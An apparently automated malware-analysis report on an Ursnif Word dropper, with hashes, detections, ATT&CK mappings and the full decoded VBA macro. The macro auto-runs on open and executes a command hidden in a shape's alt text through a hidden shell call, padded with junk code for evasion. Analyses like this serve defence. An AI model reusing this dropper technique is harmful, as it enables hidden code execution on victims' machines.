Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 b7851f3d1b2f7cd1…

MALICIOUS

Office (OLE)

Size: 68.5 KB · Created: 2018-04-19 18:59:00 · Authoring application: Microsoft Office Word · First seen: 2019-03-18
MD5: 06f24f9cc306ec79fd8e4e40aa353baf
SHA-1: 074337af03e7b4dda3f549223bd6904924d8fe55
SHA-256: b7851f3d1b2f7cd10b220613c74ce821206ba02c6349ebef9dc42af8f6710282
Risk Score: 142

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the sample as malicious with the signature 'Doc.Dropper.Ursnif-6864686-0', indicating it is likely part of the Ursnif family. The document carries a VBA project (extracted as 'macros.bas') with an AutoOpen procedure, so its code runs as soon as the document is opened with macros enabled. The AutoOpen procedure does not contain the command itself: it reads the AlternativeText of the document's second shape (ActiveDocument.Shapes(2).AlternativeText) and passes that string to 'Interaction.Shell' with vbHide, so the actual command line is stored in the document body rather than in the macro source. The remaining arithmetic on unused variables is junk code intended to hinder signature matching. Executing a hidden shell command from the document on open is typical dropper behaviour, most likely used to download and run a second-stage payload.

Heuristics (5)

  • ClamAV: Doc.Dropper.Ursnif-6864686-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1414 bytes
SHA-256: b87169c34ec094d04406ad92ae4ed374ad713c2c8db663a65fef223e8607951f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "chefowe"
Function jeXhqoI()











Set jeXhqoI = ActiveDocument.Shapes(2)

Dim FDGWC As Integer
Dim rxanykir As Long
FDGWC = 6972# - 4508#
Dim jsRWEh As Variant
jsRWEh = FDGWC - 2899#



End Function
Sub AutoOpen()

Dim PFMlTrd As Integer
Dim NWLOoAWp As Long
PFMlTrd = 6104# - 1540#
Dim KOLlajz As Variant
KOLlajz = PFMlTrd - 8083#

Dim ubnuxW As Integer
Dim UdgvlwM As Long
ubnuxW = 5311# - 9974#
Dim RVgfDd As Variant
RVgfDd = ubnuxW - 7654#

Dim npuhypigif As Integer
Dim fruna As Long
npuhypigif = 1369# - 7219#
Dim qcykavyza As Variant
qcykavyza = npuhypigif - 2686#

Set rvuwage = jeXhqoI

IvqlPB = jeXhqoI.AlternativeText

Dim jpyxo As Integer
Dim Nzrnz As Long
jpyxo = 6713# - 8222#
Dim jNsepbzW As Variant
jNsepbzW = jpyxo - 4069#



Interaction.Shell@ _
IvqlPB, vbHide

Dim fzere As Integer
Dim xvusiromi As Long
fzere = 6854# - 2189#
Dim cGgzlFg As Variant
cGgzlFg = fzere - 7456#





Dim ssuqajaf As Integer
Dim zcEMGjY As Long
ssuqajaf = 5938# - 7681#
Dim vmyvog As Variant
vmyvog = ssuqajaf - 7366#

End Sub